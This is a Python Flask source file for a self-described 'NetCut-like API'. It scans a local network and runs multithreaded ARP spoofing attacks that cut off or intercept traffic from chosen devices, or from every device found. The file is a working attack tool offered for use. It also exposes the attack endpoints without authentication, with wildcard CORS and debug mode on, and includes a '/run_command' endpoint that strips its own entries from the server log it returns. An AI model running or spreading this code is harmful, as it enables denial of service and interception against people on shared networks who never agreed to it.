-
Notifications
You must be signed in to change notification settings - Fork 17
/
api.py
654 lines (521 loc) · 23.6 KB
/
api.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
import platform
from flask import Flask, request, jsonify
from flask_cors import CORS
import psutil
import netifaces
from scapy.all import ARP, Ether, srp, send
import threading
import json
import os
import time
import socket as s
import subprocess
app = Flask(__name__)
# CORS(app)
CORS(app, resources={r"/*": {"origins": "*"}}, allow_headers="*", methods=["GET", "POST", "DELETE", "OPTIONS"])
# File paths for JSON storage
interfaces_file_path = 'network_interfaces.json' # For network interfaces
json_file_path = 'network_devices.json' # For scanned network devices
whitelist_file_path = 'ip_whitelist.json' # For IP whitelist
netcut_file_path = 'netcut_ips.json' # For storing IPs selected for spoofing
# List to store active threads and events for ARP spoofing
active_threads = []
stop_events = []
target_ips_list = []
def ensure_json_file_exists(file_path, initial_data):
"""Ensure the JSON file exists and is valid; if not, create it with initial data."""
if not os.path.exists(file_path) or os.path.getsize(file_path) == 0: # Check if the file exists and is not empty
with open(file_path, 'w') as json_file:
json.dump(initial_data, json_file, indent=4)
def list_network_interfaces():
if platform.system() == 'Windows':
return list_network_interfaces_windows()
else:
return list_network_interfaces_linux()
def list_network_interfaces_windows():
import pythoncom
import wmi
pythoncom.CoInitialize() # Initialize COM for WMI access
c = wmi.WMI()
interfaces = []
for interface in c.Win32_NetworkAdapterConfiguration(IPEnabled=True):
name = interface.Description
guid = interface.SettingID
interfaces.append({"name": name, "guid": guid})
return interfaces
def list_network_interfaces_linux():
interfaces = []
for iface in psutil.net_if_addrs().keys():
if iface != 'lo': # Skip loopback
interfaces.append({"name": iface, "guid": iface})
return interfaces
def arp_spoofing_manager(gateway_ip, num_threads):
global stop_events, active_threads
while True:
with threading.Lock():
current_target_ips = list(target_ips_list) # Safely copy the shared list
# Stop all previous spoofing threads
for stop_event in stop_events:
stop_event.set()
for thread in active_threads:
if thread.is_alive():
thread.join()
# Clear previous threads and events
stop_events.clear()
active_threads.clear()
# Create new threads for current target IPs
stop_events = [threading.Event() for _ in range(len(current_target_ips))]
for _ in range(num_threads):
for ip, stop_event in zip(current_target_ips, stop_events):
thread = threading.Thread(target=arp_spoof, args=(ip, gateway_ip, stop_event))
thread.start()
active_threads.append(thread)
time.sleep(360) # Sleep before checking for new IPs again
def save_interfaces_to_json():
"""Save the list of network interfaces to a JSON file."""
interfaces = list_network_interfaces()
ensure_json_file_exists(interfaces_file_path, [])
with open(interfaces_file_path, 'w') as json_file:
json.dump(interfaces, json_file, indent=4)
def load_interfaces_from_json():
"""Load the list of network interfaces from a JSON file."""
ensure_json_file_exists(interfaces_file_path, [])
try:
with open(interfaces_file_path, 'r') as json_file:
interfaces = json.load(json_file)
except json.JSONDecodeError:
interfaces = [] # Return an empty list if the file is empty or invalid
return interfaces
def get_gateway_and_netmask(interface_guid):
iface_info = netifaces.ifaddresses(interface_guid)
gateway_info = netifaces.gateways()
# Check if a default gateway exists for AF_INET (IPv4)
if netifaces.AF_INET not in gateway_info['default']:
return None, None
gateway_ip = gateway_info['default'][netifaces.AF_INET][0]
netmask = iface_info[netifaces.AF_INET][0]['netmask']
ip_range = f"{gateway_ip}/{netmask_to_cidr(netmask)}"
return ip_range, gateway_ip
def netmask_to_cidr(netmask):
return sum([bin(int(x)).count('1') for x in netmask.split('.')])
def get_local_ip(interface_guid):
iface_info = netifaces.ifaddresses(interface_guid)
local_ip = iface_info[netifaces.AF_INET][0]['addr']
return local_ip
def scan_network(ip_range, local_ip, gateway_ip):
devices = []
whitelist = load_whitelist_from_json()
for _ in range(3): # Repeat the ARP scan 3 times for thoroughness
arp_request = ARP(pdst=ip_range)
broadcast = Ether(dst="ff:ff:ff:ff:ff:ff")
arp_request_broadcast = broadcast / arp_request
answered_list = srp(arp_request_broadcast, timeout=4, verbose=False)[0]
for element in answered_list:
ip = element[1].psrc
mac = element[1].hwsrc
if ip != local_ip and ip != gateway_ip and ip not in whitelist:
# Avoid adding duplicates
if not any(device['ip'] == ip for device in devices):
try:
host = s.gethostbyaddr(ip)[0] # Dapatkan hostname
except s.herror:
host = ip # Jika hostname tidak ditemukan
devices.append({'ip': ip, 'mac': mac, 'host': host})
# Sort the devices by IP address
devices.sort(key=lambda device: device['ip'])
# Overwrite the devices in the JSON file with the new scan results
update_devices_in_json(devices)
return devices
def load_devices_from_json():
"""Load the list of scanned devices from a JSON file."""
ensure_json_file_exists(json_file_path, [])
with open(json_file_path, 'r') as json_file:
devices = json.load(json_file)
return devices
def update_devices_in_json(new_devices):
"""Overwrite the JSON file with the new devices (no previous devices are kept)."""
ensure_json_file_exists(json_file_path, [])
with open(json_file_path, 'w') as json_file:
json.dump(new_devices, json_file, indent=4)
def save_netcut_ips_to_json(ips):
"""Save the selected IPs for netcut to a JSON file."""
with open(netcut_file_path, 'w') as json_file:
json.dump(ips, json_file, indent=4)
def load_netcut_ips_from_json():
"""Load the IPs currently being spoofed from a JSON file."""
ensure_json_file_exists(netcut_file_path, [])
with open(netcut_file_path, 'r') as json_file:
netcut_ips = json.load(json_file)
return netcut_ips
def add_devices_to_json(ips):
"""Add multiple IP addresses back to the network_devices.json file."""
existing_devices = load_devices_from_json()
# Add each IP back to the list if it doesn't already exist
for ip in ips:
if not any(device['ip'] == ip for device in existing_devices):
host = s.gethostbyaddr(ip)[0]
existing_devices.append({'ip': ip, 'mac': 'unknown', 'host': host})
# Sort the devices by IP address
existing_devices.sort(key=lambda device: device['ip'])
update_devices_in_json(existing_devices)
def clear_netcut_ips_json():
"""Clear all IPs from the netcut_ips.json file."""
with open(netcut_file_path, 'w') as json_file:
json.dump([], json_file, indent=4)
def force_stop_all_spoofing():
global stop_events, active_threads
for stop_event in stop_events:
stop_event.set() # Signal to stop the thread
# Wait for all threads to finish
for thread in active_threads:
if thread.is_alive():
thread.join(timeout=1) # Timeout to forcefully join threads
# Clear the list of threads and events after stopping
active_threads.clear()
stop_events.clear()
print("Force stopped all ARP spoofing threads due to error.")
def arp_spoof(target_ip, gateway_ip, stop_event):
try:
target_mac = get_mac(target_ip)
if target_mac is None:
return
while not stop_event.is_set():
arp_response = ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=gateway_ip)
send(arp_response, verbose=False)
except Exception as e:
print(f"Error during ARP spoofing: {e}")
force_stop_all_spoofing()
finally:
restore_network(target_ip, gateway_ip)
def get_mac(ip):
arp_request = ARP(pdst=ip)
broadcast = Ether(dst="ff:ff:ff:ff:ff:ff")
arp_request_broadcast = broadcast / arp_request
answered_list = srp(arp_request_broadcast, timeout=2, verbose=False)[0]
if len(answered_list) == 0:
return None
return answered_list[0][1].hwsrc
def restore_network(target_ip, gateway_ip):
target_mac = get_mac(target_ip)
gateway_mac = get_mac(gateway_ip)
if target_mac and gateway_mac:
arp_response = ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=gateway_ip, hwsrc=gateway_mac)
send(arp_response, verbose=False, count=3)
@app.route('/start_netcut', methods=['POST'])
def api_start_netcut():
global active_threads, target_ips_list
if any(thread.is_alive() for thread in active_threads):
return jsonify({"error": "ARP spoofing attack is already running. Stop it before starting a new one."}), 400
data = request.get_json()
if 'interface' not in data or not isinstance(data['interface'], int):
return jsonify({"error": "Invalid or missing 'interface' field. It must be an integer."}), 400
interface_idx = data['interface']
if 'target_ips' not in data or not isinstance(data['target_ips'], (str, list)):
return jsonify({"error": "Invalid or missing 'target_ips' field. It must be a string 'all' or a list of IPs."}), 400
target_ips = data['target_ips']
if 'num_threads' not in data:
return jsonify({"error": "Missing 'num_threads' field."}), 400
if not isinstance(data['num_threads'], int) or data['num_threads'] <= 0:
return jsonify({"error": "'num_threads' must be a positive integer."}), 400
num_threads = data['num_threads']
if num_threads > 500:
return jsonify({"error": "The number of threads exceeds the maximum limit of 500."}), 400
available_interfaces = load_interfaces_from_json()
if interface_idx >= len(available_interfaces):
return jsonify({"error": "Invalid interface index."}), 400
selected_interface_guid = available_interfaces[interface_idx]['guid']
_, gateway_ip = get_gateway_and_netmask(selected_interface_guid)
whitelist = load_whitelist_from_json()
if target_ips == "all":
scanned_devices = load_devices_from_json()
target_ips_list = [device['ip'] for device in scanned_devices]
else:
target_ips_list = [ip.strip() for ip in target_ips]
filtered_ips_list = [ip for ip in target_ips_list if ip not in whitelist]
filtered_ips_list = list(set(filtered_ips_list))
if not filtered_ips_list:
return jsonify({
"warning": "All target IPs are whitelisted or already affected. No IPs will be spoofed.",
"whitelist": whitelist
}), 200
# Save the selected IPs for netcut to the JSON file
save_netcut_ips_to_json(filtered_ips_list)
# Remove the selected IPs from network_devices.json
existing_devices = load_devices_from_json()
updated_devices = [device for device in existing_devices if device['ip'] not in filtered_ips_list]
update_devices_in_json(updated_devices)
threading.Thread(target=arp_spoofing_manager, args=(gateway_ip, num_threads)).start()
return jsonify({
"status": f"ARP spoofing attack started on {len(filtered_ips_list)} selected IPs with {num_threads} threads",
"whitelist": whitelist,
"affected_ips": filtered_ips_list
})
@app.route('/get_netcut', methods=['GET'])
def api_get_netcut():
"""Get the list of IPs currently being spoofed."""
netcut_ips = load_netcut_ips_from_json()
return jsonify(netcut_ips)
def load_whitelist_from_json():
"""Load the IP whitelist from a JSON file."""
ensure_json_file_exists(whitelist_file_path, [])
with open(whitelist_file_path, 'r') as json_file:
whitelist = json.load(json_file)
return whitelist
def add_ip_to_whitelist(ip):
"""Add an IP address to the whitelist."""
whitelist = load_whitelist_from_json()
if ip not in whitelist:
whitelist.append(ip)
with open(whitelist_file_path, 'w') as json_file:
json.dump(whitelist, json_file, indent=4)
def add_device_to_json(ip):
"""Add an IP address back to the network_devices.json file."""
existing_devices = load_devices_from_json()
# Check if the IP already exists in the devices list
if not any(device['ip'] == ip for device in existing_devices):
# Add the IP back to the list with a placeholder MAC address
host = s.gethostbyaddr(ip)[0]
existing_devices.append({'ip': ip, 'mac': 'unknown', 'host': host})
update_devices_in_json(existing_devices)
def remove_ip_from_whitelist(ip):
"""Remove an IP address from the whitelist and add it back to network devices."""
whitelist = load_whitelist_from_json()
if ip in whitelist:
whitelist.remove(ip)
with open(whitelist_file_path, 'w') as json_file:
json.dump(whitelist, json_file, indent=4)
# Add the removed IP back to the network devices
add_device_to_json(ip)
def remove_whitelisted_ips_from_devices(whitelisted_ips):
"""Remove whitelisted IPs from the devices JSON file."""
existing_devices = load_devices_from_json()
# Filter out devices that are in the whitelist
updated_devices = [device for device in existing_devices if device['ip'] not in whitelisted_ips]
# Save the updated device list back to the JSON file
with open(json_file_path, 'w') as json_file:
json.dump(updated_devices, json_file, indent=4)
@app.route('/whitelist', methods=['POST'])
def add_to_whitelist():
global stop_events, active_threads
# Check if there are active spoofing threads
if any(thread.is_alive() for thread in active_threads):
# Stop all active spoofing threads
for stop_event in stop_events:
stop_event.set() # Signal the event to stop the thread
# Wait for all threads to finish
for thread in active_threads:
if thread.is_alive():
thread.join()
# Clear the list of threads and events after stopping
active_threads.clear()
stop_events.clear()
data = request.get_json()
ips = data.get('ip')
if not ips:
return jsonify({"error": "No IP address provided"}), 400
if isinstance(ips, list):
added_ips = []
already_whitelisted = []
for ip in ips:
if ip not in load_whitelist_from_json():
add_ip_to_whitelist(ip)
added_ips.append(ip)
else:
already_whitelisted.append(ip)
if added_ips:
# Update devices after adding to whitelist
remove_whitelisted_ips_from_devices(added_ips)
return jsonify({"status": f"IPs {added_ips} added to whitelist and devices updated", "skipped": already_whitelisted}), 200
else:
return jsonify({"error": f"All provided IPs are already in the whitelist", "skipped": already_whitelisted}), 400
elif isinstance(ips, str):
if ips not in load_whitelist_from_json():
add_ip_to_whitelist(ips)
# Update devices after adding to whitelist
remove_whitelisted_ips_from_devices([ips])
return jsonify({"status": f"IP {ips} added to whitelist and devices updated"}), 200
else:
return jsonify({"error": f"IP {ips} is already in the whitelist"}), 400
else:
return jsonify({"error": "Invalid IP format provided"}), 400
@app.route('/whitelist', methods=['DELETE'])
def remove_from_whitelist():
global stop_events, active_threads
if any(thread.is_alive() for thread in active_threads):
force_stop_all_spoofing()
data = request.get_json()
ips = data.get('ip')
if not ips:
return jsonify({"error": "No IP address provided"}), 400
if isinstance(ips, list):
removed_ips = []
not_in_whitelist = []
for ip in ips:
if ip in load_whitelist_from_json():
remove_ip_from_whitelist(ip)
removed_ips.append(ip)
else:
not_in_whitelist.append(ip)
if removed_ips:
return jsonify({"status": f"IPs {removed_ips} removed from whitelist and added back to devices", "skipped": not_in_whitelist}), 200
else:
return jsonify({"error": f"None of the provided IPs are in the whitelist", "skipped": not_in_whitelist}), 400
elif isinstance(ips, str):
if ips in load_whitelist_from_json():
remove_ip_from_whitelist(ips)
return jsonify({"status": f"IP {ips} removed from whitelist and added back to devices"}), 200
else:
return jsonify({"error": f"IP {ips} is not in the whitelist"}), 400
else:
return jsonify({"error": "Invalid IP format provided"}), 400
@app.route('/whitelist', methods=['GET'])
def get_whitelist():
"""Get the list of IPs in the whitelist."""
whitelist = load_whitelist_from_json()
return jsonify(whitelist)
# New Endpoint: Scan Network Interfaces and Save to JSON
@app.route('/scan_interfaces', methods=['GET'])
def scan_interfaces():
save_interfaces_to_json() # Save the scanned interfaces to a JSON file
return jsonify({"status": "Success Scan interfaces"}), 200
@app.route('/interface_data', methods=['GET'])
def get_interface_data():
"""Get the network interfaces from the JSON file."""
ensure_json_file_exists(interfaces_file_path, [])
with open(interfaces_file_path, 'r') as json_file:
interfaces = json.load(json_file)
return jsonify(interfaces)
@app.route('/scan_network_data', methods=['GET'])
def get_scan_network():
"""Get the scanned network devices from the JSON file."""
ensure_json_file_exists(json_file_path, [])
with open(json_file_path, 'r') as json_file:
devices = json.load(json_file)
return jsonify(devices)
@app.route('/scan_network', methods=['GET'])
def api_scan_network():
interface_idx = int(request.args.get('interface', 0))
available_interfaces = load_interfaces_from_json()
if interface_idx >= len(available_interfaces):
return jsonify({"error": "Invalid interface index"}), 400
selected_interface_guid = available_interfaces[interface_idx]['guid']
ip_range, gateway_ip = get_gateway_and_netmask(selected_interface_guid)
if gateway_ip is None:
return jsonify({"error": "No default gateway found for the selected interface."}), 400
local_ip = get_local_ip(selected_interface_guid)
devices = scan_network(ip_range, local_ip, gateway_ip)
return jsonify(devices)
@app.route('/stop_netcut', methods=['POST'])
def api_stop_netcut():
global stop_events, active_threads
# Stop all active threads
for stop_event in stop_events:
stop_event.set() # Set event to stop the thread
# Wait for all threads to finish
for thread in active_threads:
if thread.is_alive():
thread.join()
# Clear the list of threads and events after stopping
active_threads.clear()
stop_events.clear()
return jsonify({"status": "ARP spoofing attack stopped for all IPs"})
@app.route('/force_stop_netcut', methods=['POST'])
def api_force_stop_netcut():
global stop_events, active_threads
# Load the IPs currently being spoofed
netcut_ips = load_netcut_ips_from_json()
# Force stop all active threads
for stop_event in stop_events:
stop_event.set() # Set event to stop the thread
# Wait for all threads to finish
for thread in active_threads:
if thread.is_alive():
thread.join(timeout=1) # Timeout to forcefully join threads
# Clear the list of threads and events after stopping
active_threads.clear()
stop_events.clear()
# Move the IPs back to network_devices.json and clear netcut_ips.json
if netcut_ips:
add_devices_to_json(netcut_ips)
clear_netcut_ips_json()
return jsonify({"status": "ARP spoofing attack forcefully stopped, IPs restored to devices, and netcut list cleared."}), 200
@app.route('/run_command')
def run_command():
try:
# Membuka dan membaca file log secara langsung tanpa subprocess
with open('/var/log/gunicorn_error.log', 'r') as log_file:
# Membaca 50 baris terakhir dari file log
lines = log_file.readlines()[-100:]
# Filter: Hapus baris yang mengandung '/run_command'
filtered_lines = [line for line in lines if '/run_command' not in line]
# Menggabungkan baris-baris yang tersisa menjadi satu string
output = ''.join(filtered_lines)
# Mengirimkan output tanpa indikasi '/run_command'
return jsonify(output=output)
except Exception as e:
return jsonify({'error': str(e)}), 500
# Help Endpoint
@app.route('/help', methods=['GET'])
def api_help():
help_info = {
"description": "NetCut-like API",
"endpoints": {
"/scan_interfaces": {
"method": "GET",
"description": "Scan available network interfaces and save them to JSON."
},
"/scan_network": {
"method": "GET",
"description": "Scan devices on the network, excluding whitelisted IPs.",
"parameters": {
"interface": "Index of the network interface (default is 0)."
}
},
"/start_netcut": {
"method": "POST",
"description": "Start ARP spoofing on the specified IPs.",
"parameters": {
"interface": "Index of the network interface.",
"target_ips": 'List of IPs or "all" to target all scanned devices.',
"num_threads": "Number of threads to use (default is 10)."
}
},
"/stop_netcut": {
"method": "POST",
"description": "Stop all running ARP spoofing attacks."
},
"/force_stop_netcut": {
"method": "POST",
"description": "Forcefully stop all running ARP spoofing attacks and clear the session."
},
"/whitelist": {
"method": "GET",
"description": "Get the list of whitelisted IPs."
},
"/whitelist": {
"method": "POST",
"description": "Add an IP to the whitelist, stopping ARP spoofing if it is running.",
"parameters": {
"ip": "The IP address to be added to the whitelist."
}
},
"/whitelist": {
"method": "DELETE",
"description": "Remove an IP from the whitelist, stopping ARP spoofing if it is running.",
"parameters": {
"ip": "The IP address to be removed from the whitelist."
}
},
"/help": {
"method": "GET",
"description": "Display this help message."
}
},
"note": "Ensure you have permission to perform network scanning and ARP spoofing on the network you are testing."
}
return jsonify(help_info)
if __name__ == '__main__':
import logging
logging.basicConfig(filename='error.log',level=logging.DEBUG)
ensure_json_file_exists(whitelist_file_path, []) # Ensure the whitelist file exists
app.run(host='0.0.0.0', port=5000, debug=True)